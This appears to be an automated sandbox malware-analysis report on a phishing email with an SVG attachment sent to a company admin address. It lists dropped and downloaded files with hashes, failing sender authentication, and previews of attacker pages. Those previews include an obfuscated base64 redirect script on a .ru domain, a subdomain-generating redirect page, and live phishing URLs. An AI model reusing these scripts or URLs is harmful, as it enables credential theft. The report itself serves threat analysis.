                                                  SHA-512:F459AADC82E67D69A5991522D929044C3C4A2872AE79C1D37DB9EDB8581175EE2D0632AF4B85739970B00CCD99E91E8998C2C4FE4EEEFBB31BD4BBFF474B1055
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:............................................................................f..........._.M....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@.&j6..........................H.x.A.c.c.o.u.n.t.s.A.l.w.a.y.s.O.n.L.o.g.g.e.r...C.:.\.U.s.e.r.s.\.t.o.r.r.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.a.c.k.a.g.e.s.\.m.i.c.r.o.s.o.f.t...w.i.n.d.o.w.s.c.o.m.m.u.n.i.c.a.t.i.o.n.s.a.p.p.s._.8.w.e.k.y.b.3.d.8.b.b.w.e.\.L.o.c.a.l.S.t.a.t.e.\.H.x.A.c.c.o.u.n.t.s.A.l.w.a.y.s.O.n.L.o.g...e.t.l.........P.P..........g.M....................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):37
                                                  Entropy (8bit):3.843795932845685
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:05079CC86350248F501B45142ADDAD88
                                                  SHA1:359B8513A1934C4B0D67772B628C4B430FAD6338
                                                  SHA-256:822F131E96BB5D54E4DC998C19065E3C15C37909A0DE02E7721EE68339A1DF47
                                                  SHA-512:A8E81871D1F76DA9FF04C85C4B5A29E6C229BEF40AC33122F8E652E00ABA46D0008B1B7EF3706B835A189B7843177F60AA5202CAFB0067E3E502518D157F810B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:FDF6A1EC-03E6-457A-8662-36AE1930D6F9.
                                                  Process:C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):53
                                                  Entropy (8bit):3.951713558574187
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6E454258315DDED8053A91316C7C6841
                                                  SHA1:4374831933CFAEE0EBCC238DAF0E1EB2FDEAA9F2
                                                  SHA-256:1FAE2A563C7F1BF62EB85B2322798A78DB1960F26E004456E57952A55F538353
                                                  SHA-512:5AF8EF46894B37B25F412C919B0FB827C3FB7F5829FB8D691D6976CA8FD383862CA009F28C7DD947829CED390B4776B05E0215957CF75E402E87B39C450B31BA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:1742288364825..259BC463-F36B-49AB-AB5F-F0F718387FF9..
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):110592
                                                  Entropy (8bit):4.510501407512603
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5DBEF77411D795AC8B7EED7872D650F2
                                                  SHA1:ED4C20E67DBB1B344721193550A9C1311045F7EE
                                                  SHA-256:787B0CE5255027A3A18CF0A919CE9B200AEAC7EB1FE3264788FAF08FDC6D7DFC
                                                  SHA-512:BA56B27BA3AF7A6B22AA3AB1D915D2A53BC2DA4CC478C939A2DF0AD0018ABF39E709D7B8D215862604563264F036A096B2217157EF4B48D8FC4FC87E318F445F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:............................................................................d............)'....................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@.&j6............)'............v.2._.O.U.T.L.O.O.K.:.1.b.e.c.:.c.0.a.5.1.b.c.5.2.a.9.8.4.5.b.f.9.7.d.c.8.b.d.8.5.3.b.1.2.6.1.7...C.:.\.U.s.e.r.s.\.t.o.r.r.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.5.0.3.1.8.T.0.4.5.8.3.8.0.0.0.3.-.7.1.4.8...e.t.l...........P.P..........)'....................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                  File Type:Microsoft Outlook email folder (>=2003)
                                                  Category:dropped
                                                  Size (bytes):271360
                                                  Entropy (8bit):2.666801190138904
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2A2AD27EFCC9A48BF707ED6754271DB6
                                                  SHA1:93E4066A707883D6367B62564A03D7DC16E4EE71
                                                  SHA-256:B233327EA3049C1A1F2C3423448D1D885E8DFFDE3A140FDA2D0C2CF14DDEA825
                                                  SHA-512:AAD6C5788660FB70A8CBF59833C0261B71B0CED02CF834F963D8191D6D82D2C6CFA1E4CF9D17A5DA476CEA59B3B75F323EEE1DADECCAD52D6EB2A03AFC982C60
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:!BDN.X.SM......\..............E.......b................@...........@...@...................................@...........................................................................$.......D......................D........p......A...........................................................................................................................................................................................................................................................................................H.......9G.k.#d.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):131072
                                                  Entropy (8bit):2.9350429961535487
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B9AF1549041AD4D9DC480C22E3A4A401
                                                  SHA1:7BA7FA239279E58816CD904F21A71DFAD24B0E68
                                                  SHA-256:13CD044802BC742FD4419284FF168C4467316C750143AD8BEAB5E1B7253AD3B1
                                                  SHA-512:B3EB60B03DC50A1DF8ACE91A55B6861E65EDA065F510059ABE6B9E83FBE521B9DCD223C284761E7AAC1C807451026B2358360D32D30A94C1BBE3DAA9C44946EF
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:...LC...c....................................#.!BDN.X.SM......\..............E.......b................@...........@...@...................................@...........................................................................$.......D......................D........p......A...........................................................................................................................................................................................................................................................................................H.......9G.k.#d.............B............#.........................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):48316
                                                  Entropy (8bit):5.6346993394709
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                  Category:downloaded
                                                  Size (bytes):18633
                                                  Entropy (8bit):4.578954023736971
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5875F7B344E438D3833FEE8CC1A34B41
                                                  SHA1:785573F9FD3304B8E28BB815346C772335034A7E
                                                  SHA-256:6D6198488A73BE0A56C5814748FADECF517AC662919CA1CA20B629FB62E0A126
                                                  SHA-512:BD6B25B8A4112920CEC080311CF7B15BB025610EF96452924F4A595F3413393A66EF82A75D5836879A25B8F698446FFC41F911B916F5D6CBD9B078CB64F5FD4C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://mjj6bxg1xo.moydovv.com/jFIlzWqSXCfn6wNHvB6C4VOJ6eUL2XfKC41xF6IAkhhtCs7xTdngwFjRLPyuMHCrRLgWgWS9Lz3mCBCLHAyGS3LqWNfKsMB2OjTOub2JcUNPZwEa39XlF6nCaRVOlRBan99j9oRo3PlIuwhrbT6tOqHhsNgZu1kNmotrgkGcmEpfwGfZL7kNR3x5TcEIoaX5gc4b5xlh/0kH7FYAJC6z7gu5UqtFDdKEemyYtMEX4qvSzJaofSVWjumVcKRIHYRUkgZosSgjugIzNpiZIWWgcI6g19a8O6BeSmjnpkEKsPmq0Er6nPcprXPaGCNbZmWTZK2XWUAP5b3Rtl7lXvyxtd8XxJRKonLcrA5T696jpVLnQ2nMY6AYJpsGmoAkzBk8CZJCvsxctEl43p0GK/admin@weareworkspace.com
                                                  Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Instant Redirect Script</title>.. <script>.. // Revised list of positive ID words.. const idWords = [.. 'sessionsid', 'accountid', 'identifier', 'statusid', 'accessid', 'tokenid', .. 'referenceid', 'authenticationid', 'processingid', 'userid', 'portalid', 'appid', 'siteid', 'centerid', 'hubid', 'zoneid' .. ];..........// NEW ADDITION: Business-like subdomain prefixes and suffixes.. const businessPrefixes = ['secure', 'app', 'portal', 'login', 'my', 'web', 'connect', .. 'api', 'cloud', 'service', 'mail', 'docs', 'support', 'account', 'client', 'user', 'admin', 'dev', 'stage'];.. .. const businessSuffixes = ['portal', 'app', 'site', 'center', 'hub', 'zone', 'space', .. 'access
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):937
                                                  Entropy (8bit):7.737931820487441
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FC3B7BBE7970F47579127561139060E2
                                                  SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                  SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                  SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://developers.cloudflare.com/favicon.png
                                                  Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65447)
                                                  Category:downloaded
                                                  Size (bytes):89501
                                                  Entropy (8bit):5.289893677458563
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (65368)
                                                  Category:downloaded
                                                  Size (bytes):192147
                                                  Entropy (8bit):4.675889043942739
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4011BEE054400593DCB6C5BAE06F5071
                                                  SHA1:051DDDA79F6331C57540A150B993549BAD7F05B1
                                                  SHA-256:8CC36BCC1520D18A83800F5A6C6D06D3BEB73F2DB5D7F1326F8DF3F7DDF2E8B1
                                                  SHA-512:848857F6DADAB01FF5A38C642E46CAFF109C7D00DB93B75724608289ADBBD4DB4B5374F1283EE5734696B13037F56510D5ED60C017A3C95A7D2A1B90B16CD710
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/s23Rup/
                                                  Preview:<script>.aHzRKvJjQF = atob("aHR0cHM6Ly96ci5rdnR3enMucnUvczIzUnVwLw==");.IpdjqtsSXc = atob("bm9tYXRjaA==");.upoEfIEaDn = atob("d3JpdGU=");.if(aHzRKvJjQF == IpdjqtsSXc){.document[upoEfIEaDn](decodeURIComponent(escape(atob('
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (48238)
                                                  Category:downloaded
                                                  Size (bytes):48239
                                                  Entropy (8bit):5.343270713163753
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:184E29DE57C67BC329C650F294847C16
                                                  SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                                  SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                                  SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                                  Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:very short file (no magic)
                                                  Category:downloaded
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://qnj64b.cuisbp.ru/loray$68hba2u
                                                  Preview:1
                                                  File type:RFC 822 mail, ASCII text, with CRLF line terminators
                                                  Entropy (8bit):6.062280662263334
                                                  TrID:
                                                  • E-Mail message (Var. 5) (54515/1) 100.00%
                                                  File name:Attached_image+from+ADMIN@weareworkspace.com.eml
                                                  File size:17'104 bytes
                                                  MD5:2d1af9462bcd19be477567f98b92c668
                                                  SHA1:9a8d1963e58b01428e7978ecf98cf7e2be09dfa5
                                                  SHA256:9bfbd17ee769100f624267016c853a93c194b10b418b12c17d4601da5b44148c
                                                  SHA512:76b92d7392eeafe3c197f478658a2abdd9a54fac55d25cea494df84532ead7392c52e46b2f5bb9de58567811d03094ea1eb5fb52471ce3d27ebe8c3fdeacdf51
                                                  SSDEEP:384:DR3BvS1t4t/tRKH9tzkuOc1oTfHPQ8dioBsrtdgy/9a+bMvGI:rutst29tzQG2vQ8Irtd/WvGI
                                                  TLSH:95725C057B536522EBB421417D742C8A128CBB55F4B651C47D1B667B02EB0BF7F38CA8
                                                  File Content Preview:Received: from LO0P265MB3083.GBRP265.PROD.OUTLOOK.COM (2603:10a6:600:184::14).. by LO6P265MB6016.GBRP265.PROD.OUTLOOK.COM with HTTPS; Tue, 18 Mar 2025.. 07:10:16 +0000..Received: from DUZPR01CA0192.eurprd01.prod.exchangelabs.com.. (2603:10a6:10:4b6::15) b
                                                  Subject:Attached/image from ADMIN@weareworkspace.com
                                                  From:ePrinter 0379008470 <info@servis.ai>
                                                  To:Admin <admin@weareworkspace.com>
                                                  Cc:
                                                  BCC:
                                                  Date:Tue, 18 Mar 2025 07:08:13 +0000
                                                  Communications:
                                                  • [EXTERNAL] Above for your perusal. ------------------------------------ This email has been scanned for spam & viruses. If you believe this email should have been stopped by our filters, click the following link to report it (https://portal-uk.mailanyone.net/index.html#/outer/reportspam?token=dXNlcj1hZG1pbkB3ZWFyZXdvcmtzcGFjZS5jb207dHM9MTc0MjI4MTc4Njt1dWlkPTY3RDkxQkUzNjRCOEYwMTQ5M0I2MzdBQjI3OUJEOTZBO3Rva2VuPTg5YjM4MmMxNWZmN2JjZWFiZDExNDU3NzBkZDVkMmE3MGZhYmY1MjQ7).
                                                  Attachments:
                                                  • 2758881647.svg
                                                  Key Value
                                                  Received:from [10.95.0.11] (unknown) by geopod-ismtpd-3 (SG) with ESMTP id wrolQjgBRzqzrgS8hOPfCA for <admin@weareworkspace.com>; Tue, 18 Mar 2025 07:08:13.140 +0000 (UTC)
                                                  From:ePrinter 0379008470 <info@servis.ai>
                                                  To:Admin <admin@weareworkspace.com>
                                                  Subject:Attached/image from ADMIN@weareworkspace.com
                                                  Thread-Topic:Attached/image from ADMIN@weareworkspace.com
                                                  Thread-Index:AQHbl9TM30WSVKZcrEu6jFSjCSTwpA==
                                                  Date:Tue, 18 Mar 2025 07:08:13 +0000
                                                  Message-ID:<ORIGINAL-RELEASE-wrolQjgBRzqzrgS8hOPfCA@geopod-ismtpd-3>
                                                  Content-Language:en-GB
                                                  X-MS-Exchange-Organization-AuthSource:DB1PEPF000509FB.eurprd03.prod.outlook.com
                                                  X-MS-Has-Attach:yes
                                                  X-MS-Exchange-Organization-Network-Message-Id:2b7b9d65-75e4-4bd4-47ed-08dd65ebddf7
                                                  X-MS-TNEF-Correlator:
                                                  X-MS-Exchange-Organization-RecordReviewCfmType:0
                                                  received-spf:pass (in6r.electric.net: domain of em9655.servis.ai designates 149.72.56.183 as permitted sender) client-ip=149.72.56.183; envelope-from=bounces+25952314-8aa1-admin=weareworkspace.com@em9655.servis.ai; helo=o1.ptr5164.freeagentsoftware.com;
                                                  x-ms-exchange-organization-originalclientipaddress:192.162.217.18
                                                  x-ms-exchange-organization-originalserveripaddress:10.167.242.37
                                                  x-ms-publictraffictype:Email
                                                  x-ms-traffictypediagnostic:DB1PEPF000509FB:EE_|LO0P265MB3083:EE_|LO6P265MB6016:EE_
                                                  x-ms-exchange-crosstenant-originalarrivaltime:18 Mar 2025 07:09:46.9825 (UTC)
                                                  x-ms-exchange-crosstenant-fromentityheader:Internet
                                                  x-ms-exchange-crosstenant-id:daebecca-4bbe-4655-b317-ec2ee0c02541
                                                  x-ms-exchange-transport-crosstenantheadersstamped:LO0P265MB3083
                                                  x-ms-exchange-transport-endtoendlatency:00:00:29.0353606
                                                  x-ms-exchange-crosstenant-network-message-id:2b7b9d65-75e4-4bd4-47ed-08dd65ebddf7
                                                  authentication-results:spf=fail (sender IP is 192.162.217.18) smtp.mailfrom=em9655.servis.ai; dkim=fail (body hash did not verify) header.d=servis.ai;dmarc=fail action=oreject header.from=servis.ai;compauth=none reason=451
                                                  x-ms-office365-filtering-correlation-id:2b7b9d65-75e4-4bd4-47ed-08dd65ebddf7
                                                  x-microsoft-antispam:BCL:0;ARA:13230040|4143399015|29132699027|82310400026|9113399012|4053099003|43540500003;
                                                  x-eopattributedmessage:0
                                                  x-forefront-antispam-report:CIP:192.162.217.18;CTRY:IE;LANG:en;SCL:-1;SRV:;IPV:NLI;SFV:NSPM;H:smtp-in6.electric.net;PTR:smtp-in6.electric.net;CAT:NONE;SFS:(13230040)(4143399015)(29132699027)(82310400026)(9113399012)(4053099003)(43540500003);DIR:INB;
                                                  authentication-results-original:in6r.electric.net; iprev=pass (o1.ptr5164.freeagentsoftware.com) smtp.remote-ip=149.72.56.183; spf=pass smtp.mailfrom=em9655.servis.ai; dkim=pass header.d=servis.ai header.s=s1 header.a=rsa-sha256; dmarc=skipped
                                                  x-ms-exchange-processed-by-bccfoldering:15.20.8534.029
                                                  x-ms-exchange-crosstenant-authsource:DB1PEPF000509FB.eurprd03.prod.outlook.com
                                                  x-ms-exchange-crosstenant-authas:Anonymous
                                                  X-Microsoft-Antispam-Mailbox-Delivery:ucf:0;jmr:0;auth:0;dest:I;ENG:(910005)(944506478)(944626604)(4710137)(4712020)(920097)(930097)(140003);
                                                  X-Microsoft-Antispam-Message-Info:qEPtZ3T4jH7RuSTTsWgco+WMwINhA/Q9GJM5Y/BKO47DMApPrMTILQ1WA4P3MOnvtK8XJCtjS7aRVXir94qIycah1tVUJUokQyCfAFH7eL5ASxBQJD8V1mu9oVD+QvWKXriuHdkFkprO2M1O9kNMaue4uobvLeAAy13KdAZW2MO8Q79XPOc8RIR04Js/zxk99I/ZLJmOfEM9vlS76BCW2slavx2J+PwCIh+Nj9zFJwpBguFnHzfaEN3JpKijDOKLIIrAEa2+pdrbD9RxdujjwK0cW4b50QxcdygJT3iq0rpIM/Vx2d91ylx13iLGCBTOKCojxBj2EPQxOAp4n0OePf1C9p/7M5G0JzMg+qhIzCkTa8qq0tX5AWI9hicgKAKj0cw94SZo94gW0wr9uHdtsJiQcMdwlZBL7EjgecHLAwEXqywpyzIHizcxIbNWW7bvk65ynybTDLjbTGk20soYN9JV4ZxW3N8FuQ8gT230gMw2JjEnmHUtoIcJGif+HFmNTa6FQPsVZqcD6eJHlf7Q/PaOllZVYYkYPsIFiuM81iSLdJBRfELQRQTiPrr7ojGFrnSfaqNskrfAgif7+KdIpn+y1gV6VpOkNxknp//e4x7zH+WnU5YDDBJs0WmH8b0J/qX4yOYL9SwRHHvORN/omVIrjqtww8H3sLBLMVtgcgqhYOsAE9Pp9UYpqopKFqhZf2RUA73mFp+KsCl4VAaW+s/N3Vg0OX+ziwgNnmh8n0qoejxI0q0638qDjXVCwyHYGCobdBqyrBP5Bz+zUl04rrkDub9Ek/W0UL2tR59kMQ/lTzRnHzyW4NF7hHaITmWh12hatmP+viOf/CvA4gwJ30OpbAhtM3sJn9VUe+cOZ3YJTcBA9EAqEGi2L8Zms36Du2PpbHvTqc3k/Jf2/Of7p0w+maFZ7fGpOr7QxVje4agsopjiWbWqMA2KK8Z1T9Pm78PlxosGLawhDOSO+xxKBawYqkGrN5aoT1YWXyiwmMv/S2qqW6tu9rxsvP/vomNmQWTjSulBS+AE/ONiG3lk/J3oq2OsMk7ESAmLWruUSS5h28AhPJbUce0kpiZ6UHQeo4aIN47CMZdVY2G6mkkQM1KOWHYuFHcc0ai0/tr+QtoK8+oHrygDvfsph5fXuiZiGr2OtIoYnc/TFv3g9VY3+4+6IJ6dWmJ9SDotQgOp5IhTJbO4FNBxhtEEHI3iFxyL/WhCxYyAYnUJUfbIHpp4/dT5l1I3c0ZdorV4boav2zSvrg5bw3vipO24XzLQz2tmcosuJAWbCDYfeI/5do01bZepp+L1CK1YYNtORwbDLKEohVL43LGSCMcovSHPazGFBmFW08X9Z+uFTNw1Dde/bg1mG5Usb3MRk2U0jVs5T0vJva3tuDJPzftjA8ZoBv9mtFNI65S/n4Ys4AqgPBApQkKttL/89ussUydy96d/kRUBCTH7Qi7wFJnWM7VluiXokvgTtbp7OA1+ATzLpJnE/JaZsy8pREZCG4KYlAPXE0Ohrt6pmAn+vsj79fGZcYjH5S77gmIeF60fUp0u+qSJ3Der7BwAug/ysRAXD9jUQFmvnDo7bs+akM2emttxpiUdFRBuHrmI7vB/IRkJYUhwPkIH8t4bN48H8C3HXmhD9trMiQnSd/AttJTmPPtr3j560TVfJxMV84CMn5bDdZocpZhV0GUWN5sZWbidb80oBzq45SRO3/YH7dijhBY5M+GQHXl5h3kLEY7tQjCy81FuAlKrapXOpsvIXCVSy8o+NA+DWNV4YSnKzE5ll0zNKKcPqSH5Y4jYNKEdIJrbdY/68EqeL9y/IoZx1PhEK3ss0L5NCiPaYKTBmhGG6tRBKwnAuk+KXpVadibyM6a4Kdj/9LdbUknn+5MChFjrL4HTBm9LFJnv+BldmN9iVFU90
